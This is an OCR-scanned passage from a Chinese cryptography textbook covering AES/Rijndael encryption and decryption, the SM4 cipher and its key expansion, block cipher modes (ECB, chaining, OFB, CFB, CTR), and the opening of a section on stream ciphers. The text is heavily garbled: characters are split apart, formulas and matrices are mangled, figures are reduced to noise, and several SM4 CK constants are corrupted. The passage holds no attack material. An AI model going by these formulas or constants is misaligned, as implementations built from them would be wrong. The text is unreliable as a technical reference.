Nk>6 的 密 钥 扩 展 策略 与 Nks6 的 密 钥 扩展 策略 相 比 , 区 别 在 于 当 I 是 4 的 整数 倍 时 ， 
需要 先 将 W[I-1] 进 行 ByteSub 变换 。 这 样 就 在 扩展 密 钥 中 增加 了 部 分 字 的 ByteSub 变换 ， 
从 而 提高 了 扩展 密 钥 的 安全 性 。 这 是 因为 当 Nk>6 时 密 钥 很 长 ， 仅 仅 对 Nk 的 整数 倍 的 
位 置 处 的 字 进 行 ByteSub 变换 ， 就 显得 ByteSub 变换 的 密度 较 稀 ， 安 全 程度 不 够 强 。 

2. 图 密 钥 选择 

圈 密 钥 工 由 圈 密 钥 缓 冲 区 WwW[INbsJ] 到 W[Nb*(I+1) 一 1] 的 字 组 成 .例如 ,Nb=4 H. Nk=4 
的 圈 密 钥 选择 如 图 2-13 所 示 。 


W9| WI1i0| wii 


图 2-13 Nb=4 H. Nk=4 的 圈 密 钥 选 择 


2.2.3.4 ”加密 算法 
RIJNDAEL 加 密 算法 由 以 下 部 分 组 成 : 
(1) 一 个 初始 圈 密 钥 加 。 
(2) Nr-1 圈 的 标准 轮 函数 。 
(3) 最 后 一 圈 的 非 标 准 轮 函数 。 
用 伪 码 表示 : 


Rijndael (State, CipherKey) 
{ 
KeyExpansion (CipherKey, ExpandedKey) 
AddRoundKey (State, ExpandedKey) 
For (I=1; I<Nr; I++) 
Round (State, ExpandKey+Nb* I) 
{ByteSub (State) ; 
ShiftRow (State) ; 
MixColumn (State) ; 
AddRoundKey (State, ExpandedKey+Nb*I; ) } 
FinalRound (State, ExpandedKey+Nb*Nr) 
{ByteSub (State) ; 
ShiftRow (State) ; 
AddRoundKey (State, ExpandedKey+Nb*Nr); } 
} 


注意 第 一 步 和 最 后 一 步 都 用 了 圈 密 钥 加 ， 因 为 任何 没有 密 钥 参与 的 变换 都 是 容易 被 
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攻破 的 。 例 如 DES 中 的 初始 置换 IP 和 逆 初 始 置换 下-1， 因 为 没有 密 钥 参与 变换 ， 因 而 
密码 意义 不 大 。 
2.2.3.5 ”解密 算法 
由 于 RIJNDAEL 算法 不 是 对 合 运算 ， 所 以 RUNDAEL 的 解密 算法 与 加 密 算法 不 同 。 
根据 解密 算法 应 当 是 加 密 算法 的 逆 ， 最 直接 的 办 法 是 把 加 密 算法 倒序 执行 ， 便 得 到 解密 
算法 。 但 是 这 样 得 到 的 解密 算法 不 便于 工程 实现 。 
由 于 RIJNDAEL 设计 得 非常 巧妙 ， 使 得 我 们 只 要 略 稍 改变 一 下 密 钥 扩 展 策略 ， 便 可 
以 得 到 等 价 的 解密 算法 ， 等 价 解密 算法 的 结构 与 加 密 算法 的 结构 相同 ， 从 而 方便 了 工程 
实现 。 等 价 解密 算法 中 的 变换 为 加 密 算法 中 相应 变换 的 逆 变换 。 
1， 逆 变换 
ShiftRow 的 逆 是 状态 的 后 三 行 分 别 移动 Nb-C1，Nb-C2 和 Nb-C3 个 字 节 。 
MixColumn 的 逆 类 似 于 MixColumn， 把 状态 的 每 列 都 乘 以 一 个 固定 的 多 项 式 d(x): 
d(x) =‘OB’ x? +‘0D x? +092’ +0” (2-17) 
容易 验证 ， 式 2-16 的 cx) Gat 2-17 的 do 的 积 等 于 单位 元 01。 所 以 d(x) 是 cok 
逆 多 项 式 。 
AddRoundKey 的 逆 就 是 它 自己 。 
ByteSub 的 逆 是 把 S_box 的 逆 作 用 到 状态 的 每 个 字 节 上 。ByteSub 的 逆 变 换 按 如 下 方 
法 得 到 ， 首 先进 行 式 〈2-18) 的 道 变换 ， 然 后 再 取 GF(2”) 上 的 乘法 逆 。 式 (2-18) 是 根 
Wisk (2-15) 推出 的 ， 两 式 中 的 矩阵 互 为 道 矩 阵 。 
ai (00100101) (% 
x}|}/10010010| |» 
x} 101001001] |x» 
x,|_]10100100] |», 
x,|/01010010| |z; 
Xs 00101001 ys 
x,| |10010100] |y, 
x,} (01001010) (y, 
2. RRMA EM 
逆 轮 函数 的 定义 如 下 : 


(2-18) 


oo co oc Oo - oc = 


Inv_Round (State, Inv_RoundKey) 
{ InvByteSub (State); 
InvShiftRow (State) ; 
InvMixColunm (State) ; 
AddRoundKey (State, Inv_RoundKey); } 


io 


A 
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最 后 一 圈 的 非 标准 逆 轮 函数 如 下 : 


Inv_FinalRound (State, Inv_RoundKey) 
{ InvByteSub (State); 
InvShiftRow (State) ; 
AddRoundKey (State, Inv_RoundKey); } 


3， 解 密 算法 
利用 逆 轮 函 数 可 将 解密 算法 表述 如 下 : 


Inv_Rijndael (State, CipherKey) 
{ 
Inv_KeyExpansion (CipherKey, Inv_ExpandedKey) ; 
AddRoundKey (State, Inv_ExpandedKey+Nb*Nr) ; 
For (I= Nr-1 ;1I>0;I--) 
Inv_Round (State, Inv_ExpandedKey+Nb*T) ); 
{InvByteSub (State); 
InvShiftRow (State) ; 
InvMixColumn (State) ; 
AddRoundKey (State, Inv_ExpandedKey+Nb*I); } 
Inv_FinalRound (State, Inv_ExpandedKey) 
{ InvByteSub (State) ; 
InvShiftRow (State) ; 
AddRoundKey (State, Inv_ExpandedKey); } 
} 


注意 : 解密 算法 与 加 密 算法 使 用 的 圈 密 钥 的 顺序 相反 。 

其 中 解密 算法 的 密 钥 扩展 定义 为 

(1) 加 密 算法 的 密 钥 扩展 。 

(2) 把 InvMixColumn 应 用 到 除 第 一 圈 和 最 后 一 圈 之 外 的 所 有 圈 密 钥 上 。 
用 伪 c 码 表示 如 下 : 


Inv_KeyExpansion (CipherKey, Inv_ExpandedKey) 
{ Key Expansion (CipherKey, Inv_ExpandedKey) ; 
For (I=1; I<Nr; I++) InvMixColumn(Inv_ExpandedKey+Nb*I); } 


2.2.3.6 RIJNDEAEL 的 安全 性 

RIJNDAEL 算法 的 安全 设计 策略 是 宽 轨 迹 策略 (Wide Trail Strategy)。 宽 轨迹 策略 是 
针对 差分 攻击 和 线性 攻击 提出 来 的 。 它 的 最 大 优点 是 可 以 给 出 算法 的 最 佳 差分 特征 的 概 
率 以 及 最 佳 线性 逼近 的 偏差 界 ， 由 此 可 以 分 析 算 法 抵抗 差分 攻击 和 线性 攻击 的 能 力 。 从 
而 确保 密码 算法 具有 所 需要 的 抵抗 差分 攻击 和 线性 攻击 的 能 力 ， 确 保密 码 算 法 的 安全 。 
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以 上 技术 设计 ， 使 得 RUNDAEL 密码 算法 具有 很 高 的 安全 性 。 据 目前 的 分 析 ， 
RIJNDAEL 密码 算法 能 有 效 抵抗 目前 已 知 的 攻击 ， 如 差分 攻击 、 线 性 攻击 、 相 关 密 钥 攻 
击 和 插值 攻击 等 。 目 前 在 理论 上 攻击 RUNDAEL 密码 算法 的 最 有 效 方法 还 是 穷 举 攻 
击 ， 但 是 RUNDAEL 密码 算法 的 最 短 密 钥 是 128 位 ， 这 使 得 穷 举 攻击 在 实际 上 是 不 可 

ERJ 

RIJNDAEL 的 数据 块 长 度 和 密 钥 长 度 都 可 变 ， 因 此 能 够 适应 不 同 的 安全 应 用 环境 。 
即使 今后 计算 能 力 和 攻击 能 力 提 高 了 , 只 要 及 时 提高 密 钥 的 长 度 , 便 可 获得 满意 的 安全 ， 
因此 密码 的 安全 使 用 寿命 长 。 

至 今 尚未 发 现 RINDAEL 算法 的 严重 缺陷 。 但 是 可 以 肯定 ， 就 像 RUNDAEL 算法 
有 优点 一 样 ， 也 一 定 会 有 弱点 。 


2.2.4 SM4 算法 


2006 年 我 国 国家 密码 管理 局 公布 了 无 线 局 域 网 产品 使 用 的 SM4 密码 算法 。 这 是 我 
国 第 一 次 公布 自己 的 商用 密码 算法 ， 意 义 重大 ， 影 响 深 远 。 这 一 举措 标志 着 我 国 商用 密 
码 管理 更 加 科学 化 和 与 国际 接轨 。 这 必 将 促进 我 国 商用 密码 的 科学 研究 和 产业 发 展 。 

SM4 密码 算法 设计 简洁 ， 算 法 结构 有 特点 ， 安 全 高 效 。 它 的 公开 颁布 向 世界 展示 了 
我 国 在 商用 密码 方面 的 研究 成 果 。 

SM4 密码 算法 是 一 个 分 组 算法 。 数 据 分 组 长 度 为 128 比特 ， 密 钥 长 度 为 128 比特 。 
加 密 算法 与 密 钥 扩展 算法 都 采用 32 HERRAR. SM4 密码 算法 以 字 节 (8 位 ) 和 字 (32 
位 ) 为 单位 进行 数据 处 理 。SM4 密码 算法 是 对 合 运算 ， 因 此 解密 算法 与 加 密 算法 的 结构 
相同 ， 只 是 轮 密 钥 的 使 用 顺序 相反 ， 解 密 轮 密 钥 是 加 密 轮 密 钥 的 逆序 。 
2.2.41 基本 运算 

SM4 密码 算法 使 用 模 2 加 和 循环 移 位 作为 基本 运算 。 

。 模 2 加: ©, 32 位 异 或 运算 

© 循环 移 位 ，<<< i， 把 32 位 字 循 环 左 移 i 位 
2.2.4.2 ”基本 密码 部 件 

SM4 密码 算法 使 用 了 以 下 基本 密码 部 件 。 

1. SÅ 

SM4 的 8 盒 是 一 种 以 字 节 为 单位 的 非 线性 代替 变换 ,其 密码 学 的 作用 在 于 起 到 混淆 
KER. S 盒 的 输入 和 输出 都 是 8 位 的 字 节 。 它 本 质 上 是 8 位 的 非 线性 置换 。 设 输入 字 
节 为 a， 输 出 字 节 为 5»， 则 5S 盒 的 运算 可 表示 为 : 

b=S Box (a) (2-10) 

3 盒 的 代替 规则 如 表 2-9 所 示 。 例 如 ， 设 5 盒 的 输入 为 EF， 则 5 盒 的 输出 为 表 2-9 

中 第 E 行 与 第 FF 列 交点 处 的 值 84。 即 ，S8_ Box (EF) =84。 


Ka 
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2， 非 线性 变换 7 
SM4 的 非 线性 变换 十 一 种 以 字 为 单位 的 非 线性 代替 变换 。 它 由 4 个 S 盒 并 置 构成 。 
KECH S ARIETE 
设 输 入 字 为 4=-(aoauaza)， 输 出 字 为 B=(bo,b1,b2,b3)， 则 
B= 1(A)=(S_box(ao), S_box(al), S_box(az), S_box(as)) (2-20) 
3， 线 性 变换 部 件 工 
线性 变换 部 件 工 是 以 字 为 处 理 单位 的 线性 变换 部 件 ， 其 输入 输出 都 是 32 位 的 字 。 
其 密码 学 的 作用 在 于 起 到 扩散 的 作用 。 
设 工 的 输入 为 字 B， 输 出 为 字 C， 则 
C=L (B) 
=B ® (B<<<2) ® (B<<<10) ® (B<<<18) ® (B<<<24) (2-21) 
4. 合成 变换 了 
合成 变换 了 由 非 线性 变换 t 和 线性 变换 工 复合 而 成 ， 数 据 处 理 的 单位 是 字 。 设 输入 
AEX, 则 先 对 瑟 进 行 非 线 性 rz 变 换 ， 再 进行 线性 工 变 换 。 记 为 
TCD=LICCD) (2-22) 
合成 变换 了 是 非 线性 变换 r 和 线性 变换 工 的 复合 ， 所 以 它 同时 起 到 混淆 和 扩散 
的 作用 ， td 
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2.2.43 eH 
SM4 密码 算法 采用 对 基本 轮 函数 进行 迭代 的 结构 。 利 用 上 述 基本 密码 部 件 ， 便 可 构 
成 轮 函 数 。SM4 密码 算法 的 轮 函数 是 一 种 以 字 为 处 理 单位 的 密码 函数 。 
WIERA F RRAN Xo Xi X, X), WA 32 位 字 ， 共 128 位 。 轮 密 钥 为 rk, 
水 也 是 一 个 32 位 的 字 。 轮 函数 下 的 输出 也 是 一 个 32 位 的 字 。 轮 函数 下 的 运算 由 式 (2-23) 


给 出 : 


F(X, Xi, Xa, X, 1k)= Xp © TX; © X © X @ rk) (2-23) 
根据 式 (2-22), 
F(X, Xi, X» X tk)=X@L(t(X% @ Xz @ Xz @rk)) 
简 记 B=(Xi 0 X eX; ork), 根据 式 (2-19) 和 (2-20), A 
F(X, Xi, Xo, Xz, rk)= Xo @[S_box (B)] ®[S_box (B)<<<2] ®[S_box (B)<<<10] © 
[S_box (B)<<<J8] ®[S_box (B)<<<24] 
图 2-14 给 出 了 轮 函数 的 结构 ， 其 中 5 表示 5 盒 变换 。 


24 10 f 18 f 24 f 
S S S 
s S| d S S ss 
S S Ss S sS 
S S S Ss s 
[ I l 
中 - 中 -一 出 -一 出 -一 由 -一 


图 2-14 SM4 的 轮 函数 


2.2.4.4 ”加密 算法 

SM4 密码 算法 是 一 个 分 组 算法 。 数 据 分 组 长 度 为 128 比特 ， 密 钥 长 度 为 128 比特 。 
加 密 算法 采用 32 轮 和 迭代 结构 ， 每 轮 使 用 一 个 轮 密 钥 。 

设 输入 明文 为 (而 , Xir X X), 四 个 字 , 共 128 位 。 输入 轮 密 钥 为 rki, i=0, 1,…， 
31， 共 32 SH. HALA Oo, Yi h, Ys), WAF, 128 位 。 则 加 密 算法 可 描述 
如 下 。 


Hop 


ar 
对 
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加 密 算法 : 


=X; © (X © Xa © X43 Orki), i=0, 131 (2-24) 
(Yor Yo Po Y3)=Xs Xs X33» Xz) 

加 密 算法 的 框图 如 图 2-15 所 示 。 由 图 可 以 看 出 , 虽然 SM4 的 加 密 算法 与 DES、AES 
一 样 都 采用 了 基本 轮 函 数 迭 代 的 结构 ,但 是 SM4 的 加 密 迭 代 处 理 有 自己 的 不 同 特点 。 即 ， 
SM4 的 加 密 和 迭代 处 理 方 式 具 有 密 文 反馈 连接 和 流 密码 的 某 些 特点 ， 前 一 轮 加 密 的 结果 与 
前 一 轮 的 加 密 数 据 拼 接 起 来 供 下 一 轮 加 密 处 理 。 一 次 加 密 处 理 四 个 字 ， 产 生 一 个 字 的 中 
间 密 文 ， 这 个 中 间 密 文 与 前 三 个 字 拼 接 供 下 一 次 加 密 处 理 ， 共 迭代 加 密 处 理 32 轮 , 产生 
出 四 个 字 的 密 文 。 整 个 加 密 处 理 过 程 像 一 个 宽度 为 4 个 字 的 窗口 在 滑动 , 加 密 处 理 一 轮 ， 
窗口 滑动 一 个 字 ， 窗 口 滑 动 32 ke, MERRER. 


eee al 


Xx | Xn | Xu | Xs Y, | Y 


it 


(oe Xino Xas Xirs, rki) 


明文 


Xe Xai 


rk, -| F 


图 2-15 SM4 的 加 密 算法 


2.2.4.5 解密 算法 
SM4 密码 算法 是 对 合 运算 ， 因 此 解密 算法 与 加 密 算法 的 结构 相同 ， 只 是 轮 密 钥 的 使 
用 顺序 相反 ， 解 密 轮 密 钥 是 加 密 轮 密 钥 的 逆序 。 
WMA RICH (Xo, Xo X X), HARRY rki, i=31, 30, =, 1, 0, AH 
明文 为 Fo Ys Y Ys) WARFO HRU F o 
解密 算法 : 
Xivg=F(Xi, Xims Xiz Xirs, rki) 
= X; ® T(Xin © Xin OF ®© rki), i=31, 30, -+1,0 (2-25) 
(Yo: Y Yo, ¥3)=(%3s> X34, X33» X32) 
2.2.4.6 SAP RAE 
SM4 密码 算法 使 用 128 位 的 加 密 密 钥 ， 并 采用 32 ERME, FOE 
用 一 个 32 位 的 轮 密 钥 ， 共 使 用 32 个 轮 密 钥 。 因 此 需要 使 用 密 钥 扩展 算法 ， 从 加 密 密 钥 
产生 出 32 个 轮 密 钥 。 
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1. 常数 FK 

在 密 钥 扩展 中 使 用 如 下 的 常数 : 
FKo=(A3B1BAC6)，FK,=(56AA3350)，FK2=(677D9197)，FKs=(B27022DC)。 

2. 固定 参数 CK 

共 使 用 32 个 固定 参数 CKi，CKi 是 一 个 字 ， 其 产生 规则 如 下 : 

设 ckij 为 CKi 的 第 j 字 节 (i=0,1,…,31; 7=0,1,2,3) ， 即 CKi=(ckio，ckil，ckiz，ckis3)， 


则 
ckij= (4i+7)*7 (mod 256) (2-26) 

这 32 个 固定 参数 如 下 十 六 进 制 〉: 

00070e15, 1¢232a31, 383£464d, 545b6269, 

7077785, 8c939aal, a8afb6bd, c4cbd2d9, 

eOe7eef5, fc030al11, 181£262d, 343b4249, 

50575e65, 6c737a81, 888£969d, a4abb2b9, 

c0c7ced5, dce3eafl, £8£f060d, 141b2229, 

30373e45, 4c535a61, 6867674, 848b9299, 

a0a7aebS, bec3cad1, d8dfe6ed, £4fb0209, 

10171e25, 2c333a41, 484f565d, 646b7279 

3. BAY RAE 

设 输入 加 密 密 钥 为 MK= (MKo，MK1，MK2，MK3)， 输 出 轮 密 钥 为 rki， 二 0,1…,30， 
31， 中 间 数 据 为 态 ， 关 0,1,…,34，35。 则 密 钥 扩 展 算 法 可 描述 如 下 。 

密 钥 扩展 算法 : 

© (Ko.Ki,K2,K3)=(MKo ® FKo, MK; @FKı, MK: eFK:，MK3 eFK3) 

@ For i=0,1,-++,30, 31 Do 

iki= Ki+4= Ki @T' (Kit1 @Ki+2 @Ki+3 ® CKi) 

说 明 : 其 中 的 也 变换 与 加 密 算 法 轮 函 数 中 的 了 基本 相同 ,只 将 其 中 的 线性 变换 工 修 

改 为 以 下 的 工 ': 


L' (B)=B @ (B<<<13) ® (B<<<23) 

分 析 密 钥 扩 展 算法 可 以 发 现 ， 在 算法 结构 方面 密 钥 扩展 算法 与 加 密 算 法 类 似 ， 也 是 
采用 了 32 轮 类 似 的 迭代 处 理 。 

特别 应 当 注意 的 是 在 密 钥 扩 展 算法 中 采用 了 非 线 性 变换 r， 这 将 大 大 加 强 密 钥 扩展 
的 安全 性 。 这 一 点 与 AES 密码 类 似 。 而 DES 的 子 密 钥 生产 算法 却 没有 采用 类 似 措施 。 
2.2.4.7 SM4 的 安全 性 

SM4 密码 算法 是 我 国 专业 密码 机 构 设 计 的 商用 密码 算法 , 主要 用 于 无 线 局 域 网 产品 
的 安全 保密 。SM4 密码 算法 经 过 我 国 专业 密码 机 构 的 充分 分 析 测 试 , 可 以 抵抗 差分 攻击 、 
线性 攻击 等 现 有 攻击 ， 因 此 是 安全 的 。 
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SM4 密码 算法 公布 后 引起 国际 密码 界 的 关注 , 国内 外 的 密码 学 者 已 经 开始 对 其 进行 
研究 分 析 。 国 内 学 者 对 其 进行 了 21 轮 的 差分 攻击 ,但 SM4 密码 算法 采用 32 轮 迁 代 结构 ， 
因此 这 种 差分 攻击 尚 不 能 对 其 构成 实质 威胁 。 根据 目前 的 公开 文献 ， 尚 未 发 现 SM4 有 重 
要 缺陷 。 


2.2.5 分 组 密码 工作 模式 


分 组 密码 可 以 按 不 同 的 模式 工作 ， 实 际 应 用 的 环境 不 同 应 采用 不 同 的 工作 模式 。 只 
有 这 样 才能 既 确 保安 全 ， 又 方便 高 效 。 

2.2.51 电子 代码 本 模式 

电码 本 模式 ECB (Electric Code Book) ”直接 利用 分 组 密码 对 明文 的 各 分 组 进行 加 
密 。 设 明文 M= (Mi, Mz t, Mr), WARE CC, Cos s Ca) HP 

Ci= (Mi, K) , i=1,2,*++,n (2-27) 
电码 本 方式 是 分 组 密码 的 基本 工作 模式 。 

(1) ECB 的 一 个 缺点 是 要 求 数据 的 长 度 是 密码 分 组 长 度 的 整数 倍 ， 和 否则 最 后 一 个 数 

(2) ECB 方式 的 另 一 缺点 是 容易 暴露 明文 的 数据 模式 。 

在 计算 机 系统 中 ， 许 多 数据 都 具有 某 种 固有 的 模式 。 这 主要 是 由 数据 元 余 和 数据 结 
构 引 起 的 。 例 如 ， 各 种 计算 机 语言 的 语句 和 指令 都 十 分 有 限 ， 因 而 在 程序 中 便 表 现 为 少 
量 的 语句 和 指令 的 大 量 重复 。 各 种 语言 程序 往往 具有 某 种 固定 格式 。 数 据 库 的 记录 也 往 
往 具 有 某 种 固定 结构 ， 如 学 生成 绩 数据 库 一 定 包 含 诸 如 姓名 、 学 号 和 各 科 成 绩 等 字段 。 
计算 机 通信 通常 按 固 定 的 步骤 和 格式 进行 。 如 工作 站 和 网 络 服务 器 之 间 的 联络 一 定 从 
LOGIN 开始 。 如 果 不 采 取 措 施 ， 根 据 明 文 相同 、 密 钥 相 同 ， 则 密 文 相 同 的 道理 ， 这 些 固 
有 的 数据 模式 将 在 密 文 中 表现 出 来 。 掩 盖 明文 数据 模式 的 有 效 方法 有 采用 某 种 预 处 理 技 
术 和 链接 技术 。 
2.2.5.2 ”密码 分 组 链接 模式 

首先 介绍 明 密 文 链接 方式 (Plaintext and Ciphertext Block Chaining). 

PHY SC M= (Mi, Mz, s Mn), HARIR C=C, Cos +s Cn) M 

clr beso (2-28) 
! |E(M, ®M,., ®C,.,K),i=2,---.n 

其 中 Z 为 初始 化 向 量 。 

根据 式 〈2-28) 可 知 ， 即 使 M=M;, (AIT Me Ci AMAe Ga, ATIE 
CC， 从 而 掩盖 了 名 文中 的 数据 模式 。 同 样 根据 式 〈2-28) 可 知 加 密 时 ， 当 Mi 或 Ci 中 
发 生 一 位 错误 时 ， 自 此 以 后 的 密 文 全 都 发 生 错 误 。 这 种 现象 称 为 错误 传播 无 界 。 

解密 时 有 ， 
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7 D(C,,K)®Z,i=1 
| D(C,K)® M, 18C ,i=2,.,n oe 
同样 ， 解 密 时 也 是 错误 传播 无 界 。 
进一步 为 了 使 相同 的 报 文 也 产生 不 同 的 密 文 ， 应 当 使 Z 随 机 化 ， 每 次 加 密 均 使 用 不 
同 的 初始 化 向 量 Z 。 
明 密 文 链接 的 工作 原理 如 图 2-16 所 示 。 


[| m My M, 

T i ae 1 1 

2 个 中 JJ J z -中 
| | | 

Ki E 一 全 | E K £ 
1 1 

Cı G M Cn 

K— D |'k—| p | Kı—| D 


4 


2 = 
Tot 


Mı M n 
图 2-16 ” 明 密 文 链接 工作 原理 


明 密 文 链接 方式 具有 加 解密 错误 传播 无 界 的 特性 ， 而 磁盘 文件 加 密 通 常 希望 解密 错 
误 传播 有 界 ， 这 时 可 采用 密 文 链接 方式 。 在 式 (2-28) 和 (2-29) 去 掉 参 数 Mi1， 即 明文 
不 参与 链接 ， 只 让 密 文 参与 链接 ， 便 成 为 密 文 链接 方式 。 

加 密 时 ， 


E(M, ®Z,K),i=1 
i (2-30) 


E(M, ®C,,,K),i=2,---.n 
根据 式 〈2-30) 可 知 加 密 时 ， 当 Mi 或 G 中 发 生 一 位 错误 时 ， 自 此 以 后 的 密 文 全 都 
发 生 错 误 ， 同 样 为 错误 传播 无 界 。 
解密 时 ， 


D(C,,K)®Z,i=1 
: (2-31) 


D(C,K) eC_i= 2.4 
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而 根据 式 〈2-31) 可知 解密 时 ，Ci 发 生 了 错误 ， 则 只 影响 Ma 和 Mi 发 生 错误 ， 其 
余 不 错 ， 因 此 错误 传播 有 界 。 
密 文 链接 的 工作 原理 如 图 2-17 所 示 。 


M M Mn 
ae 4 

cA -Ð WD = acl 
| | | 
KLE |k—{ zr | Ki—>|_E 
| | 

Cı Ga TF Gn 
K—| D K—| p Kı, — D 
| | | 

1 i 

Mı M Mn 


图 2-17 密 文 链接 的 工作 原理 


与 ECB 一 样 ，CBC 的 一 个 缺点 也 是 要 求 数 据 的 长 度 是 密码 分 组 长 度 的 整数 倍 ， 否 
则 最 后 一 个 数据 块 将 是 短 块 ， 这 时 需要 特殊 处 理 。 
2.2.5.3 ”输出 反馈 模式 
输出 反馈 工作 模式 将 一 个 分 组 密码 转换 为 一 个 密 钥 序列 产生 器 。 从 而 可 以 实现 用 分 
组 密码 按 流 密码 的 方式 进行 加 解密 。 这 种 工作 模式 的 安全 性 取决 于 分 组 密码 本 身 的 安 
全 性 。 
输出 反馈 方式 的 工作 原理 如 图 2-18 所 示 。 其 中 R 为 移 位 寄存 器 。 五 为 分 组 密码 ， 如 
DES, IDEA, AES, SM4 等 强 密码 ， 设 其 分 组 长 度 为 mn。 五 为 尺 的 初始 状态 并 称 为 种 子 ， 
下 为 密 钥 。 分 组 密码 EE 把 移 位 寄存 器 RR 的 状态 内 容 作 为 明文 ， 并 加 密 成 密 文 。E 输出 的 
密 文中 最 右边 的 s C<s<n) 位 作为 密 钥 序列 输出 ， 与 明文 异 或 实现 序列 加 密 。 同 时 ， 移 
位 寄存 器 RR 左 移 s 位, E 输 出 中 最 右边 的 这 s 位 又 反馈 到 寄存 器 Ro R 的 新 状态 内 容 作为 
瑟 下 一 次 加 密 的 输入 。 如 此 继续 。 

解密 时 RR 和 EE 按 加 密 时 同样 的 方式 工作 , 产生 出 相同 的 密 钥 流 ， 与 密 文 异 或 便 完成 
了 解密 。 
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这 种 工作 模式 将 一 个 分 组 密码 转换 为 一 个 序列 密码 。 它 具有 普通 序列 密码 的 优 缺 
点 ， 如 没有 错误 传播 。 设 加 密 时 mi 错 了 一 位 , 则 只 影响 密 文 中 对 应 一 位 , 不 影响 其 他 位 。 
同样 ， 设 解密 时 c 错 了 一 位 ， 则 只 影响 明文 中 对 应 一 位 ， 不 影响 其 他 位 。 

输出 反馈 工作 模式 适 于 加 密 元 余 度 较 大 的 数据 ， 如 语音 和 图 像 数 据 ， 但 因 无 错误 传 
播 而 对 密 文 的 自 改 难以 检测 。 


= | 
h 一 -| R 5 位 
K E 5 位 
y 
De 
m, G 


图 2-18 输出 反馈 工作 原理 


2.2.5.4 ”密码 反馈 模式 

密码 反馈 工作 模式 的 原理 与 输出 反馈 的 工作 原理 基本 相同 ， 如 图 2-19 所 示 ， 所 不 
同 的 仅仅 是 反馈 到 移 位 寄存 器 R 的 不 是 E 输 出 中 的 最 右 s 位 , 而 是 异 或 之 后 的 密 文 ci 的 
s Lo 


b —] R | 5 位 
1 
K—+| E | shiz 
ot 
m, 


Cc 
图 2-19 密码 反馈 工作 原理 


VER: 解密 时 RR 和 E 按 加 密 时 同样 的 方式 工作 ， 结 合 密 文 ， 便 可 产生 出 同样 的 密 钥 
流 ， 与 密 文 异 或 便 完成 了 解密 。 开 始 时 ，R= hh，E 的 输出 为 E Uo, K) 把 E o, K) 
中 的 最 右 s 位 与 密 文 cl 异 或 ， 得 到 明文 mi。 同 时 把 ci 反馈 给 R， 于 是 又 可 产生 下 一 个 正 
确 的 密 钥 流 。 如 此 继续 ， 可 完整 解密 。 

密 文 反 馈 工作 模式 的 错误 传播 情况 与 输出 反馈 工作 模式 不 同 。 加 密 时 车 明文 mi; 错 了 
一 位 ， 则 影响 密 文 c 错 ， 这 一 错误 反馈 到 移 位 寄存 器 后 将 影响 到 后 续 的 密 钥 序列 错 ， 导 
致 后 续 的 密 文 都 错 。 同 样 ， 解 密 时 车 密 文 c 错 了 一 位 ， 则 影响 明文 m; 错 ,但 密 文 的 这 一 
错误 反馈 到 移 位 寄存 器 后 将 影响 到 后 续 的 密 钥 序列 错 ， 导 致 后 续 的 明文 都 错 。 


| te 
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这 种 加 解密 都 错误 传播 无 界 的 特性 ， 使 得 密 文 反馈 工作 模式 适合 数据 完整 性 认证 方 
面 的 应 用 。 
2.2.5.5 CTR (Counter Mode Encryption) 模式 

CTR 模式 是 Diffie 和 Hellman F 1979 年 提出 的 ， 在 征集 AES 工作 模式 的 活动 中 由 
California 大 学 的 Phillip Rogaway 等 人 的 推荐 。 

CTR 模式 与 密 文 反馈 工作 模式 和 输出 反馈 工作 模式 一 样 , 把 分 组 密码 转化 为 序列 密 
码 。 在 本 质 上 是 利用 分 组 密码 产生 密 钥 序 列 ， 按 序列 密码 的 方式 进行 加 解密 。 

WET, To, cet) Tras Tn 是 一 给 定 的 计数 序列 ，M1，Ms，…，Mn-1，Ma 是 明文 ， 其 
"A Mi, Mas s, Mm 是 标准 块 ，M 的 长 度 等 于 u, u 小 于 等 于 分 组 长 度 。CTR 的 工作 
模式 的 加 密 过 程 如 下 : 


C;=M;®0,,i=1,2,…,n-1. (2-32) 
C, = M, ® MSB,, (O,). 

其 中 MSBy (On) 表示 On 中 的 高 x 位 。 

CTR 的 工作 模式 的 解密 过 程 如 下 : 

0, = E(T.,K),i=1,2,…,n. 

M, =C,®0,,i=1,2,---.n-1. (2-33) 

M, =C, ® MSB,,, (O,). 

CTR 模式 的 优点 是 可 并 行 、 效 率 高 、Qi 的 计算 可 预 处 理 、 适 合 任意 长 度 的 数据 、 加 
解密 速度 快 ， 而 且 在 加 解密 处 理 方式 上 适合 随机 存 取 数据 的 加 解密 。 因 此 ， 特 别 适 合计 
算 机 随机 文件 的 加 密 ， 因 为 随机 文件 要 求 能 随机 地 访问 。 这 对 数据 库 加 密 是 有 重要 意 
义 的 。 

CTR 模式 的 加 密 算法 是 对 合 运 算 ， 加 解密 过 程 仅 涉及 加 密 运 算 ， 不 涉及 解密 运算 ， 
因此 不 用 实现 解密 算法 。CTR 模式 的 缺点 是 没有 错误 传播 ， 因 此 不 适合 用 于 数据 完整 性 
认证 。 


e = E(T,,K),i=1,2,---,n. 


2.3 序列 密码 


序列 密码 是 密码 学 的 一 个 重要 分 枝 ， 由 于 人 们 对 序列 密码 的 研究 比较 充分 ， 而 且 序 
列 密码 具有 实现 容易 、 效 率 高 等 特点 , 所 以 序列 密码 成 为 许多 重要 应 用 领域 的 主流 密码 。 
本 章 讨论 序列 密码 的 基本 理论 及 其 在 计算 机 系统 中 的 应 用 。 


2.3.1 序列 密码 的 概念 
“一 次 一 密 ” 密 码 在 理论 上 是 不 可 破译 的 这 一 事实 使 人 们 感觉 到 ， 如 果 能 以 某 种 方 
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式 仿效 “一 次 一 密 ” 密 码 ， 则 将 可 以 得 到 保密 性 很 高 的 密码 。 长 期 以 来 ， 人 们 试图 以 序 
列 密码 方式 仿效 “一 次 一 密 ” 密 码 ， 从 而 促进 了 序列 密码 的 研究 和 发 展 。 目 前 ， 序 列 密 
码 的 理论 已 经 比较 成 熟 ， 而 且 具 有 工程 实现 容易 、 效 率 高 等 特点 ， 所 以 序列 密码 成 为 许 
多 重要 领域 应 用 的 主流 密码 体制 。 

为 了 安全 ， 序 列 密码 应 使 用 尽 可 能 长 的 密 钥 ， 而 长 的 密 钥 的 存储 、 分 配 都 很 困难 。 
于 是 人 们 采用 一 个 短 的 种 子 密 钥 来 控制 某 种 算法 产生 出 长 的 密 钥 序列 ， 供 加 解密 使 用 ， 
而 短 的 种 子 密 钥 的 存储 、 分 配 都 较 容 易 。 

图 2-20 给 出 了 序列 密码 的 原理 。 序 列 密码 加 解密 器 采用 简单 的 模 2 加 法 器 ,这 使 得 
序列 密码 的 工程 实现 十 分 方便 。 于 是 ， 序 列 密码 的 关键 就 是 产生 密 钥 序列 的 算法 。 密 钥 
